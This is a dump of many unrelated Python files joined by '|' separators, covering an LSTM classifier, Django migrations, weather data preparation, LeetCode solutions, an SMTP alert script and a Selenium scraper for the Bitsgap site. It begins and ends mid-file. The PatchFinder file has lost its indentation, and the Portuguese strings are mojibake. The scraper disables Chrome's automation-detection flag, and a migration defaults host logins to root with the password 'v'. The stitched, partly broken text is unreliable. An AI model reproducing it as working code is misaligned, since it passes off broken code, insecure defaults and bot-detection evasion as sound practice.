                      help="the multi field names to be copied, e.g., 'area,perimeter', use comma to sperate them but no space")
    (options, args) = parser.parse_args()
    # BUG FIX: the old check `len(sys.argv) < 2` passed with a single
    # shapefile argument, and main() then crashed with IndexError on
    # args[1]. Two positional shapefiles are required.
    if len(args) < 2:
        parser.print_help()
        sys.exit(2)
    main(options, args)
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn import Embedding, LSTM
class LSTMClassifier(nn.Module):
    """LSTM-based sequence classifier over frozen pretrained embeddings.

    Args:
        output_size: number of output units (sigmoid applied per unit).
        hidden_size: LSTM hidden state size.
        layers_num: number of stacked LSTM layers.
        bidirectional: whether the LSTM is bidirectional.
        vocab_size: vocabulary size for the embedding table.
        dropout: inter-layer LSTM dropout probability.
        embedding_length: embedding dimensionality.
        weights: pretrained embedding matrix, shape (vocab_size, embedding_length).
    """

    def __init__(self, output_size, hidden_size, layers_num, bidirectional,
                 vocab_size, dropout, embedding_length, weights):
        super(LSTMClassifier, self).__init__()
        self.output_size = output_size
        self.hidden_size = hidden_size
        self.vocab_size = vocab_size
        self.embedding_length = embedding_length
        # Number of final hidden-state vectors fed to the classifier head
        # (doubled for bidirectional LSTMs).
        self.layers_num = 2 * layers_num if bidirectional else layers_num
        self.word_embedding = Embedding(vocab_size, embedding_length)
        # BUG FIX: the pretrained vectors were assigned to ".weights", which
        # is not an Embedding attribute, so they were silently ignored. The
        # real parameter is ".weight" (kept frozen, as intended).
        self.word_embedding.weight = nn.Parameter(weights, requires_grad=False)
        self.lstm = LSTM(embedding_length, hidden_size,
                         num_layers=layers_num, dropout=dropout,
                         bidirectional=bidirectional)
        self.label = nn.Linear(self.layers_num * hidden_size, output_size)

    def forward(self, x):
        """Classify a batch of token-id sequences.

        Args:
            x: LongTensor of shape (batch, seq_len).
        Returns:
            Tensor of shape (batch, output_size) with sigmoid activations.
        """
        x = self.word_embedding(x)
        # LSTM expects (seq_len, batch, features) when batch_first=False.
        x = x.permute(1, 0, 2)
        # Random initial hidden/cell states (kept from the original design).
        # torch.autograd.Variable is deprecated; plain tensors participate in
        # autograd. Creating them on the input's device also fixes the old
        # behavior of forcing CUDA whenever available, which crashed when the
        # model/input lived on the CPU.
        h_0 = torch.rand(self.layers_num, x.size(1), self.hidden_size,
                         device=x.device)
        c_0 = torch.rand(self.layers_num, x.size(1), self.hidden_size,
                         device=x.device)
        output, (final_hidden_state, final_cell_state) = self.lstm(
            x, (h_0, c_0))
        # Concatenate the final hidden states of all layers/directions.
        out = final_hidden_state.permute(1, 0, 2)
        out = out.contiguous().view(out.size(0), out.size(1) * out.size(2))
        out = self.label(out)
        return torch.sigmoid(out)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
    """Alter harvest.Job.publish so jobs survive deletion of their Publish.

    The FK is made nullable with on_delete=SET_NULL, so removing a
    tablemanager.Publish no longer cascades into deleting jobs.
    """

    dependencies = [
        ('harvest', '0009_auto_20160219_1402'),
    ]

    operations = [
        migrations.AlterField(
            model_name='job',
            name='publish',
            field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, editable=False, to='tablemanager.Publish', null=True),
            preserve_default=True,
        ),
    ]
|
import glob
import numpy as np
from os.path import basename, isdir, isfile
from PIL import Image
from osm import OSMinterface
class PatchFinder:
def __init__(self, osm_dir, image=None):
self.image = image
if isdir(osm_dir):
if osm_dir[-1] == "/":
self.osm_dir = osm_dir
else:
self.osm_dir = osm_dir + "/"
elif isfile(osm_dir):
self.osm_dir = osm_dir
self.osms = None
def load_osm_location_distances(self, image=None):
self.image = image
img_loc = self.get_gps_location(image)
self.osms = {}
osm_to_check = []
if isfile(self.osm_dir):
osm_to_check = [self.osm_dir]
elif isdir(self.osm_dir):
osm_to_check = glob.glob(self.osm_dir + "*.osm")
for i in osm_to_check:
f = OSMinterface(i)
f.read()
self.osms[basename(i)] = {}
if f.location_in_map(img_loc):
self.osms[basename(i)]["on_map"] = True
if any(f.location_in_object(img_loc).values()):
self.osms[basename(i)]["in_object"] = \
f.location_in_object(img_loc)
else:
self.osms[basename(i)]["in_object"] = False
self.osms[basename(i)]["dist_from_object"] = \
f.location_distance_from_objects(img_loc)
else:
self.osms[basename(i)]["on_map"] = False
self.osms[basename(i)]["dist_from_map"] = \
f.location_distance_from_map(img_loc)
f = None
def print_location(self):
# Is in any patch?
maps = []
for k in self.osms:
if self.osms[k]["on_map"]:
maps.append(k)
patches = []
for m in maps:
if self.osms[m]["im_object"]:
patches.append(m)
if maps:
obj_dist = []
print "The photo", self.image, "is located in the following maps:"
for m in maps:
print " *", m
for o in self.osms[m]["dist_from_object"]:
obj_dist.append((self.osms[m]["dist_from_object"][o], m, o))
cp = min(obj_dist)
if patches:
print "It is in the following objects:"
for m in patches:
for p in self.osms[m]["in_object"]:
if self.osms[m]["in_object"][p]:
print " * map", m, "patch", p
else:
print "It is not in any particular object."
print "The closes patch is:", cp[2], "on map", cp[1], \
"in distance", cp[0]
else:
print "The photo:", self.image, "is not in any of the specified \
maps."
dist_map = []
for m in self.osms:
dist_map.append((self.osms[m]["dist_from_map"], m))
cm = min(dist_map)
print "The closes map is:", cm[1], "within", cm[0], "distance."
print "~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*"
def get_gps_location(self, image=None):
if image is None:
f = self.image
else:
f = image
return self.get_lat_lon(Image.open(f)._getexif())
def get_lat_lon(self, info):
get_float = lambda x: float(x[0]) / float(x[1])
def convert_to_degrees(value):
d = get_float(value[0])
m = get_float(value[1])
s = get_float(value[2])
return d + (m / 60.0) + (s / 3600.0)
try:
gps_latitude = info[34853][2]
gps_latitude_ref = info[34853][1]
gps_longitude = info[34853][4]
gps_longitude_ref = info[34853][3]
lat = convert_to_degrees(gps_latitude)
if gps_latitude_ref != "N":
lat *= -1
lon = convert_to_degrees(gps_longitude)
if gps_longitude_ref != "E":
lon *= -1
return lat, lon
except KeyError:
return None
|
"""
Predicting Equity Index Returns using Machine Learning Methods - Data Preparation File
"""
#%% #--------------------------------------------------
#* Load Data
import pickle
import pandas as pd
import os
from pandas.tseries.offsets import MonthEnd # To Determine the End of the Corresponding Month
# Load the raw Neely (2014) predictor data, convert returns to percentages,
# and store the cleaned frame as a pickle under data/processed/.
base_dir = os.getcwd()  # renamed from `dir`, which shadowed the builtin
df = pd.read_csv('data/raw/neely_2014.csv', na_values=['NaN'])
# The raw file stores dates as yyyymm values; keep them as 'ym' and derive a
# proper month-end timestamp column 'date'.
df.rename(index=str, columns={"date": "ym"}, inplace=True)
df['date'] = pd.to_datetime(df['ym'], format='%Y%m') + MonthEnd(1)
# Express (log) excess returns in percent.
df['sp500_rf'] = df['sp500_rf'] * 100
df['lnsp500_rf'] = df['lnsp500_rf'] * 100
df = df.sort_values(by=['date'])
df.index = df.index.astype(int)
os.makedirs(os.path.join(base_dir, 'data', 'processed'), exist_ok=True)
df.to_pickle("data/processed/df.pickle")
print("Processed data is saved as data/processed/df.pickle")
|
# Copyright 2020, Schuberg Philis B.V
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cosmicops.log import logging
from .vm import CosmicVM
class CosmicRouter(CosmicVM):
    """A Cosmic virtual router; adds reboot handling on top of CosmicVM."""

    def reboot(self):
        """Reboot this router via the Cosmic API.

        Returns True on success (or in dry-run mode), False when the async
        reboot job fails.
        """
        if self.dry_run:
            # BUG FIX: the router name was missing its closing quote in the
            # dry-run message.
            logging.info(f"Would reboot router '{self['name']}'")
            return True

        logging.info(f"Rebooting router '{self['name']}'", self.log_to_slack)

        response = self._ops.cs.rebootRouter(id=self['id'])

        if not self._ops.wait_for_job(response['jobid']):
            logging.error(f"Failed to reboot router '{self['name']}'")
            return False

        return True
|
from .clustergram import Clustergram
|
import json
from typing import Dict, List, Optional, Set, Union
import justobjects as jo
@jo.data(typed=True)
class Troll:
    """A troll record: numeric weight plus a sex defaulting to "male"."""
    weight: Union[int, float]
    sex: str = "male"
@jo.data(typed=True)
class Droll:
    """A droll with an optional style and an optional set of trolls."""
    # NOTE(review): `set()` is a class-level default -- confirm jo.data
    # copies defaults per instance, otherwise instances may share one set
    # (classic mutable-default pitfall).
    style: Optional[int] = 12
    trolls: Optional[Set[Troll]] = set()
@jo.data(typed=True)
class Sphinx:
    """A sphinx aggregating drolls and per-key troll lists."""
    age: int
    drolls: Droll
    # BUG FIX: `sexes = Union[bool, str]` assigned the typing object as a
    # plain class attribute instead of declaring a typed field; every other
    # member here is an annotation, so this was clearly meant to be one too.
    sexes: Union[bool, str]
    weights: Dict[str, List[Troll]]

# Print the generated JSON schema for the composed Sphinx model.
print(json.dumps(jo.show_schema(Sphinx), indent=2))
|
from person import Person
from enrolled import Enroll
class Student(Person):  # Student inherits from Person
    """A person who can enrol in courses; tracks enrolments and status."""

    def __init__(self, first, last, dob, phone, address, international=False):
        # BUG FIX: super().__init__(self, ...) passed `self` explicitly on a
        # bound super() call, so Person.__init__ received it twice and raised
        # a TypeError. super() already binds self.
        super().__init__(first, last, dob, phone, address)
        self.international = international
        self.enrolled = []

    def add_enrollment(self, enroll):
        """Record an Enroll instance; reject anything else."""
        if not isinstance(enroll, Enroll):
            raise Exception("Invalid Enroll. . . ")
        self.enrolled.append(enroll)

    def is_on_probation(self):
        # Probation logic is not implemented yet; every student passes.
        return False

    def is_part_time(self):
        # Part-time means enrolled in three or fewer courses.
        return len(self.enrolled) <= 3
|
# Generated by Django 2.2.16 on 2022-01-20 05:58
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
    """Initial migration: creates the Deployment and Host tables.

    Both models use a UUID primary key. A Host describes a machine that can
    receive deployments (SSH access, capacity, port range); a Deployment
    records one deployed app instance on a host.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Deployment',
            fields=[
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('host', models.CharField(default='', max_length=256, verbose_name='Host FQDN/IP')),
                ('index', models.IntegerField(blank=True, default=-1, verbose_name='Host Index Number')),
                ('port', models.IntegerField(blank=True, default=0, verbose_name='Host Port')),
                ('deploypath', models.CharField(blank=True, default='', max_length=256, verbose_name='Deployment Path')),
                ('consoleid', models.IntegerField(blank=True, default=0, verbose_name='Console ID')),
                # NOTE(review): verbose_name 'User Name' on `apptype` looks
                # copy-pasted from Host.username -- confirm intended label.
                ('apptype', models.CharField(default='', max_length=64, verbose_name='User Name')),
            ],
            options={
                'verbose_name': 'Deployment',
                'verbose_name_plural': 'Deployments',
            },
        ),
        migrations.CreateModel(
            name='Host',
            fields=[
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('ipaddr', models.CharField(default='', max_length=64, verbose_name='FQDN/IP')),
                ('sshport', models.IntegerField(blank=True, default=22, verbose_name='SSH Port')),
                ('username', models.CharField(default='root', max_length=64, verbose_name='User Name')),
                ('password', models.CharField(default='v', max_length=64, verbose_name='Password')),
                ('deployroot', models.CharField(blank=True, default='/root', max_length=256, verbose_name='Deployment Root')),
                ('status', models.CharField(blank=True, choices=[('available', 'available'), ('maintainance', 'maintainance')], default='maintainance', max_length=64, verbose_name='Status')),
                ('capacity', models.IntegerField(blank=True, default=20, verbose_name='Capacity')),
                ('startport', models.IntegerField(blank=True, default=6950, verbose_name='Start Port')),
                ('current_num', models.IntegerField(blank=True, default=0, verbose_name='Deployed Number')),
                ('deployment', models.CharField(blank=True, default='', max_length=256, verbose_name='Deployment')),
            ],
            options={
                'verbose_name': 'Host',
                'verbose_name_plural': 'Hosts',
            },
        ),
    ]
|
''' Explore the statistics of dataset and Preprocess the dataset '''
import time
import sys
import numpy as np
import pandas as pd
from sklearn.cross_validation import train_test_split, KFold
import multiprocessing
###################################################################################################
# Read weather data and process weather data for missing values
# Write processed weather data to csv file
###################################################################################################
''' Check if a string is a number (int or float) '''
def is_number(s):
    """Return True if `s` can be interpreted as a number.

    Accepts anything float() parses, plus single unicode numeric characters
    (e.g. vulgar fractions) via unicodedata.numeric.
    """
    try:
        float(s)
    except ValueError:
        pass
    else:
        return True
    try:
        import unicodedata
        unicodedata.numeric(s)
    except (TypeError, ValueError):
        return False
    else:
        return True
'''
Process and impute weather data information. weather_data here has 18 columns(without station_nbr and date)
variable: data: array with 17 columns (codesum is removed, and all converted to float values)
columns names wit 19 elements
Output: Write porcessed weather data into csv file
'''
def process_weather():
    """Impute missing weather values and write Data/weather_processed.csv.

    Non-numeric entries are filled from the previous row in the same column;
    a non-numeric first row is back-filled from the next parseable value.
    """
    weather_file = pd.read_csv("Data/weather.csv", sep=',')
    weather_data = weather_file.drop('codesum', axis = 1) # Drop "codesum" column
    data = weather_data.values[:,2:] # Get rid of station_nbr and date
    # Fill in the missing values
    for col in range(data.shape[1]):
        for row in range(data.shape[0]):
            if not is_number(data[row, col]):
                if row == 0:
                    # First row: search downward for the next parseable value.
                    i = 1
                    while not is_number(data[row+i, col]):
                        i += 1
                    data[row, col] = data[row+i, col]
                else:
                    # Otherwise reuse the (already imputed) previous row.
                    data[row, col] = data[row-1, col]
            data[row, col] = float(data[row, col]) # Convert string to float value
    weather_processed = np.append(weather_file.values[:,0:2], data, axis = 1)
    df = pd.DataFrame(weather_processed, index=None, columns=weather_data.columns.values)
    df.to_csv("Data/weather_processed.csv", sep=',', index=None)
###################################################################################################
# Match training data and corresponding weather data
# Get the weather dataset for each item
# Write the item dataset to csv file
##################################################################################################
''' Create store_nbr index on station_nbr using DataFrame and index '''
def match_store_station():
    """Return a DataFrame mapping store_nbr (index) to station_nbr."""
    pairs = pd.read_csv("Data/key.csv", sep=',').values
    return pd.DataFrame(pairs[:, 1], index=pairs[:, 0])
'''
Create (date, station_nbr) index on weather data using DataFrame and Multi-index
Output: DataFrame with 17 columns of features and 2 indexs on (date, station_nbr)
'''
def read_processed_weather():
    """Load processed weather data indexed by (date, station_nbr).

    Returns a DataFrame with the 17 feature columns and a two-level index
    built from the file's date and station columns.
    """
    raw = pd.read_csv("Data/weather_processed.csv", sep=',')
    index_cols = [raw.values[:, 1], raw.values[:, 0]]
    return pd.DataFrame(raw.values[:, 2:], index=index_cols,
                        columns=raw.columns.values[2:])
'''
Given date and store_nbr, return the corresponding weather data features. Specific use for match new test samples
Output: 1x17 vectors
'''
def get_weather_data(date, store_nbr, store_station_pairs, weather_file):
    """Look up the weather feature vector for (date, store_nbr).

    The store is mapped to its station via `store_station_pairs`, then the
    (date, station) row of `weather_file` is returned as a numpy array.
    """
    station = store_station_pairs.loc[store_nbr].values[0]
    return weather_file.loc[date, station].values
'''Get the list of unique item id in train file'''
def get_item_list():
    """Return the unique item ids present in Data/train.csv."""
    train = pd.read_csv("Data/train.csv", sep=',')
    return list(set(train.values[:, 2]))
'''
Given the item_nbr, retrieve all corresponding weather features
Input: item_nbr - item id
num - percentage of the number of samples should be retrieved
Output: Array with 18 columns, which contains 17 features and 1 label (the last column is label)
'''
def get_item_data(item_nbr, percent, store_station_pairs, weather_file, train_file):
    """Build the (features, label) array for one item (Python 2 code).

    Selects the last `percent` fraction of the item's training rows, joins
    each row with its weather features, and appends the units sold as the
    final column. Returns an array of shape (n_selected, n_features + 1).
    """
    start = time.time()
    # NOTE(review): train_num is computed but never used below.
    train_num = train_file.values[:,1].shape[0]
    item_index = np.where(train_file.values[:,2] == item_nbr)
    item_index = item_index[0]
    num = int(item_index.shape[0]*(1-percent)) # Select according to the given percentage, need to be improved
    iter_list = range(num, item_index.shape[0])
    item_dataset = np.zeros((len(iter_list), weather_file.values.shape[1]+1))
    count = 0
    #print len(iter_list)
    for i in iter_list:
        index = item_index[i]
        #print count
        date = train_file.values[:,0][index]
        store_nbr = train_file.values[:,1][index]
        units = train_file.values[:,3][index]
        weather_data = get_weather_data(date, store_nbr, store_station_pairs, weather_file)
        # Last column is the label (units sold).
        item_dataset[count,:] = np.append(weather_data, [units], axis=0)
        count += 1
    end = time.time()
    print "Running time for item %d: %f" %(int(item_nbr), (end-start))
    return item_dataset
def write_item_data(tasks):
    """Worker entry point: write one CSV per item id pulled from `tasks`.

    `tasks` is a multiprocessing.Queue whose entries are lists of item ids;
    each worker takes one list and writes Item_data/item_<id>.csv files.
    """
    item_list = tasks.get()
    #print item_list
    store_station_pairs = match_store_station()
    weather_file = read_processed_weather() # index has 2 columns and values has 17 columns
    train_file = pd.read_csv("Data/train.csv", sep=',')
    #item_list = get_item_list()
    #item_nbr = item_list[0]
    for item_nbr in item_list:
        item_dataset = get_item_data(item_nbr, 0.1, store_station_pairs, weather_file, train_file) # Give percentage
        df = pd.DataFrame(item_dataset, index=None, columns=None)
        filename = "Item_data/item_%d.csv" %(int(item_nbr))
        df.to_csv(filename, sep=',', index=None, columns=None)
'''Multiprocessing for using all cpu cores'''
def multi_process(traget_func):
    """Fan item ids out to one worker process per CPU core.

    Splits the item list into (processors - 1) chunks plus a remainder
    chunk, puts each on a shared queue and starts `traget_func` workers.

    NOTE(review): the parameter name `traget_func` is a typo for
    `target_func`; kept as-is because renaming would break keyword callers.
    NOTE(review): this relies on Python 2 integer division -- under
    Python 3, `div` becomes a float and the slicing below fails.
    """
    processors = multiprocessing.cpu_count()
    myTasks = multiprocessing.Queue()
    item_list = get_item_list()
    temp_part = []
    div = len(item_list)/(processors-1)
    rem = len(item_list)%(processors-1)
    ind = 0
    while ind < div*(processors-1):
        temp_part.append(item_list[ind:ind+div])
        ind = ind+div
    # Remainder chunk for the last worker.
    temp_part.append(item_list[(len(item_list)-rem):])
    for each in temp_part:
        myTasks.put(each)
    Workers = [multiprocessing.Process(target = traget_func, args =(myTasks,)) for i in range(processors)]
    #Workers[0].start()
    for each in Workers:
        each.start()
#multi_process(write_item_data)
##################################################################################################
# Read Item dataset for a given item_nbr
# Split the item dataset for training and test
##################################################################################################
def read_item_data(item_nbr):
    """Load the per-item CSV and split it into features and the label column."""
    path = "Item_data/item_%d.csv" % (int(item_nbr))
    table = pd.read_csv(path, sep=',').values
    return table[:, 0:-1], table[:, -1]
def split_item_data(item_nbr, type):
    """Return the train or test split (75/25, fixed seed) for one item.

    NOTE(review): `type` shadows the builtin; any value other than
    'train'/'test' silently returns None. Also, sklearn.cross_validation
    was removed in scikit-learn 0.20 (now sklearn.model_selection).
    """
    item_data, item_label = read_item_data(item_nbr)
    X_train, X_test, y_train, y_test = train_test_split(item_data, item_label, test_size=0.25, random_state=42)
    if type == 'train':
        return X_train, y_train
    elif type == 'test':
        return X_test, y_test
##################################################################################################
# Store the full matched weather data into csv file
# Too long to run, no use for now
##################################################################################################
'''
Get the training dataset and match with weather features
Generate the csv file contains training data and corresponding weather features
'''
def get_full_data():
    """Join every training row with its weather features and dump to CSV.

    NOTE(review): marked "no use for now" by the author and appears broken:
    `read_weather()` is not defined in this module (probably meant
    read_processed_weather), and np.append(..., axis=1) on 1-D arrays
    raises. Left as-is.
    """
    train_file = pd.read_csv("Data/train.csv", sep=',')
    store_station_pairs = match_store_station()
    weather_file = read_weather() # index has 2 columns and values has 18 columns
    train_num = train_file.values[:,1].shape[0]
    item_dataset = [] # Should be 20 columns
    for ind in range(train_num):
        store_nbr = train_file.values[:,1][ind]
        date = train_file.values[:,0][ind]
        weather_data = get_weather_data(date, store_nbr, store_station_pairs, weather_file)
        weather_data = np.append(train_file.values[:,2:][ind], weather_data, axis = 1) #[item_nbr, units, weather_features]
        item_dataset.append(weather_data)
    item_dataset = np.array(item_dataset)
    train_columns = np.append(np.array(['item_nbr','units']), weather_file.columns.values, axis=1)
    train_df = pd.DataFrame(item_dataset, index=None, columns=train_columns) # Build item_nbr index on units and weather features
    train_df.to_csv("train_feature_matrix.csv", sep=',', index=None)
    return train_df
#get_full_data()
''' Read in the full training data with corresponding weather features,
should have 19 columns, and the first column is the item_nbr '''
def read_full_data():
    """Load train_feature_matrix.csv indexed by item_nbr and print it.

    Python 2 code (print statement). The first CSV column becomes the
    index; the remaining columns are the features.
    """
    train_features = pd.read_csv("train_feature_matrix.csv", sep=',')
    train_df = pd.DataFrame(train_features.values[:,1:], index=train_features.values[:,0], columns=train_features.columns.values[1:])
    print train_df
|
class F1:
    """Base class for the inheritance demo; prints a greeting."""

    def show(self):
        # Message text (including its leading space) kept identical.
        print(" messege from class F1")
class F2(F1):
    """Subclass adding its own message on top of F1's show()."""

    def disp(self):
        print("Messege from F2")
# Exercise the base class directly, then the subclass: the inherited
# show() and its own disp().
base = F1()
base.show()
derived = F2()
derived.show()
derived.disp()
|
import logging
from flask import redirect
from flask import url_for
from structlog import wrap_logger
from console import __version__
from console import app
from console import settings
logger = wrap_logger(logging.getLogger(__name__))
@app.route('/')
def localhost_to_submit():
    """Redirect the console root URL to the submit blueprint's page."""
    return redirect(url_for('submit_bp.submit'))
# Development entry point: log the console version and serve on all
# interfaces at the configured port.
if __name__ == '__main__':
    logger.info("Starting server: version='{}'".format(__version__))
    port = int(settings.PORT)
    # NOTE(review): debug=True should not be enabled in production.
    app.run(debug=True, host='0.0.0.0', port=port, threaded=True)
|
import os
import smtplib
#instead of providing email adress and password in python program
#We are passing these credential using sytem environment variables for security purpose
# Send a face-mask violation alert email via Gmail's SMTP server.
#
# Credentials are intentionally blank here; in a real deployment read them
# from environment variables instead of hard-coding them, e.g.
#   EMAIL_ADDRESS = os.environ.get('EMAIL_USER')
#   EMAIL_PASSWORD = os.environ.get('EMAIL_PASS')
EMAIL_ADDRESS = ''
EMAIL_PASSWORD = ''

# Port 587 is SMTP submission with STARTTLS; the context manager closes
# the connection automatically.
with smtplib.SMTP('smtp.gmail.com', 587) as smtp:
    smtp.ehlo()      # identify ourselves to the server
    smtp.starttls()  # upgrade the connection to TLS...
    smtp.ehlo()      # ...and re-identify over the encrypted channel
    smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
    # Header of mail
    subject = "Face Mask Voilation"
    # body of mail
    body = "One Visitor voilated Face Mask Policy. He is not wearing the mask"
    # BUG FIX: the message used to begin with a space (' Subject: ...').
    # A leading space makes the first line an invalid/folded header, so the
    # subject was not recognised -- headers must start at column 0.
    msg = f'Subject: {subject}\n\n{body}'
    smtp.sendmail(EMAIL_ADDRESS, EMAIL_ADDRESS, msg)
|
class Solution:
    def maxProfit(self, prices: List[int]) -> int:
        """Maximum profit from at most two stock transactions.

        dp_left[i]  = best single-transaction profit within prices[0..i].
        dp_right[i] = best single-transaction profit within prices[i..n-1].
        The answer is the best dp_left[i] + dp_right[i] over all split
        points (selling and re-buying on the same day is allowed).
        """
        n = len(prices)
        if n <= 1:
            return 0
        dp_left, dp_right = [0] * n, [0] * n

        # Left-to-right pass: track the cheapest buy so far.
        min_buy = prices[0]
        for i in range(1, n):
            min_buy = min(min_buy, prices[i])
            dp_left[i] = max(dp_left[i - 1], prices[i] - min_buy)

        # Right-to-left pass: track the best sell so far.
        # BUG FIX: the recurrence previously read dp_right[i - 1], a slot not
        # yet computed on a backwards sweep (still 0); it only produced
        # correct totals by accident. The correct carry is dp_right[i + 1],
        # the best profit in the suffix to the right.
        max_sell = prices[-1]
        for i in range(n - 2, -1, -1):
            max_sell = max(max_sell, prices[i])
            dp_right[i] = max(max_sell - prices[i], dp_right[i + 1])

        return max(x + y for x, y in zip(dp_left, dp_right))
# Approach: dynamic programming with two passes.
# Compute the best single-transaction profit from the left (indices 0..i)
# and from the right (indices i..n-1), then combine them at every split
# point. E.g. for [a,b,c,d,e,f,g,h,i] split at e: dp_left holds the best
# profit up to e, dp_right the best profit from e onward.
# Read a full name and report several analyses (upper/lower case, total
# letter count, first-name details).
nome = str(input('Digite seu nome completo: ')).strip()
print('Analisando seu nome...')
print('Seu nome em maiscรบlas รฉ ', nome.upper())
print('Seu nome em minรบsculas รฉ ', nome.lower())
# Count letters ignoring the spaces between name parts.
print('Seu nome tem ao todo {} letras'.format(len(nome.replace(' ', ''))))
dividido = nome.split()
# BUG FIX: nome.find(' ') only equals the first-name length when a space
# exists; for a single-word name it returns -1. Use the length of the
# first split component instead.
print('Seu primeiro nome รฉ {} e tem {} letras'.format(dividido[0], len(dividido[0])))
|
from Models.Pair import Pair
from selenium import webdriver
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from webdriver_manager.chrome import ChromeDriverManager
import time, sys
class Bitsgap:
def __init__(self, credentials, max_number_of_pairs, should_print = False):
self.credentials = credentials
self.max_number_of_pairs = max_number_of_pairs
self.should_print = should_print
self.__init_driver()
def __init_driver(self):
options = webdriver.ChromeOptions()
options.add_argument("--disable-blink-features")
options.add_argument("--disable-blink-features=AutomationControlled")
options.add_argument("--start-maximized")
#options.add_argument("--kiosk")
self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
time.sleep(5)
def login(self):
self.driver.get("https://bitsgap.com/sign-in/?d=app")
WebDriverWait(self.driver, 10).until(ec.visibility_of_element_located((By.XPATH, "//input[@id='lemail']")))
self.driver.find_element_by_xpath("//input[@id='lemail']").send_keys(self.credentials.username)
self.driver.find_element_by_xpath("//input[@id='lpassword']").send_keys(self.credentials.password)
actions = ActionChains(self.driver)
actions.send_keys(Keys.ENTER)
actions.perform()
time.sleep(5)
self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
self.__wait_for_strategy_list()
def __get_pairs(self, category = Pair.categories['Month']):
results = set()
for i in range(0, self.max_number_of_pairs):
pairs_and_profit, pairs_range = self.__get_pairs_and_profit_list()
for j in pairs_range:
pair_index = j
profit_index = j + 1
results.add( Pair(
symbol_str = pairs_and_profit[ pair_index ],
profit_str = pairs_and_profit[ profit_index ],
category = category
) )
if len(results) >= self.max_number_of_pairs:
return results
self.__scroll_list_down()
return results
def __get_pairs_and_profit_list(self):
pairs_and_profit__dom = self.driver.find_element_by_xpath("//div[@class='strategies-list']")
pairs_and_profit = pairs_and_profit__dom.text.splitlines()
pairs_amount = int( len( pairs_and_profit ) / 2 )
pairs_range = range(0, pairs_amount, 2 )
return pairs_and_profit, pairs_range
def get_month(self):
monthly_pairs = self.__get_pairs(category = Pair.categories['Month'])
self.__print(monthly_pairs)
self.__print("------------final--------------------month-------------")
return monthly_pairs
def get_week(self):
self.__switch_list(current_text = 'Month', index = 1)
weekly_pairs = self.__get_pairs(category = Pair.categories['Week'])
self.__print(weekly_pairs)
self.__print("------------final--------------------Week-------------")
return weekly_pairs
def get_three_days(self):
self.__switch_list(current_text = 'Week', index = 0)
daily_pairs = self.__get_pairs(category = Pair.categories['3_days'])
self.__print(daily_pairs)
self.__print("------------final--------------------Daily-------------")
return daily_pairs
def __switch_list(self, current_text = 'Month', index = 1):
strategies = self.driver.find_element_by_xpath("//div[@class='strategies']")
xpath_str = "//span[contains(text(),'{}')]".format(current_text)
strategies.find_element_by_xpath( xpath_str ).click()
time.sleep(2)
self.driver.find_elements_by_xpath("//li[@class='MuiButtonBase-root MuiListItem-root MuiMenuItem-root strategies__menu-item MuiMenuItem-gutters MuiListItem-gutters MuiListItem-button']")[index].click()
time.sleep(2)
self.__wait_for_strategy_list()
def __wait_for_strategy_list(self):
WebDriverWait(self.driver, 30).until(ec.visibility_of_element_located((By.XPATH, "//div[@class='strategies__list']")))
def __scroll_list_down(self):
self.driver.execute_script("document.querySelector('.strategies-list').scrollBy(0,100)")
time.sleep(2)
def cleanup(self):
self.driver.quit()
def __print(self, payload):
    """Debug-print *payload* when self.should_print is truthy.

    An iterable of objects is printed one vars() dict per item; anything
    that does not support that (strings, ints, objects without __dict__)
    is printed as-is.
    """
    if self.should_print:
        try:
            # Plain loop instead of a throwaway list comprehension used
            # only for side effects; catch TypeError specifically rather
            # than a bare `except:` (which also swallowed KeyboardInterrupt
            # and SystemExit).
            for item in payload:
                print(vars(item))
        except TypeError:
            print(payload)
|
r"""
Given a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of
the tree, and every node has no left child and only 1 right child.
Example 1:
Input: [5,3,6,2,4,null,8,1,null,null,null,7,9]
5
/ \
3 6
/ \ \
2 4 8
/ / \
1 7 9
Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9]
1
\
2
\
3
\
4
\
5
\
6
\
7
\
8
\
9
Constraints:
1. The number of nodes in the given tree will be between 1 and 100.
2. Each node will have a unique integer value from 0 to 1000.
"""
class TreeNode:
    """Definition for a binary tree node."""
    def __init__(self, val: int = 0, left: 'TreeNode' = None, right: 'TreeNode' = None) -> None:
        # Payload value and optional child links (None = absent child).
        self.val = val
        self.left = left
        self.right = right
class Solution:
    """Flatten a BST into a strictly increasing, right-only chain.

    All three variants return a tree whose leftmost in-order value is the
    new root, with no left children and a single right child per node.
    (A stale commented-out reverse-order variant has been deleted.)
    """

    def increasingBST1(self, root):
        """Collect values with a recursive in-order walk, then rebuild.

        O(n) time, O(n) extra space for the value list plus new nodes.
        """
        nodes = []

        def dfs(tree):
            if tree:
                dfs(tree.left)
                nodes.append(tree.val)
                dfs(tree.right)

        dfs(root)
        # Dummy head: the rebuilt chain hangs off res.right.
        res = cur = TreeNode()
        for x in nodes:
            cur.right = TreeNode(x)
            cur = cur.right
        return res.right

    def increasingBST2(self, root):
        """Same idea, but streams the in-order values with `yield from`."""
